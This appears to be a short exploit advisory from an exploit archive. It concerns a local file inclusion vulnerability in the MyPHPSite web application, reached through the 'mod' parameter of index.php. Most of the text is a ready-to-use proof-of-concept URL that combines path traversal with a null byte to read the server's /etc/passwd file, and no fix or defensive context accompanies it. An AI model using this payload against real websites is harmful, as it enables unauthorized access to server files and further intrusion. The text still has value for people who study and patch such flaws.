id: 4500
date: 12/18/2008
title: MyPHPsite (index.php mod) Local File Inclusion Vulnerability
author: Piker
cves: 

============================================================
MyPHPsite (index.php mod) Local File Inclusion Vulnerability
============================================================


################################################################
#
#
#    MyPHPSite Local File Inclusion Vulnerability
#
#
#    Affected software: MyPHPSite
#    Vendor: www.myphpsite.org
#    Risk: Medium
#
################################################################
#
#    http://[target]/[path]/index.php?mod=[LFI]%00
#
#   PoC: http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00
#
################################################################



#  0day.today [2023-03-23]  #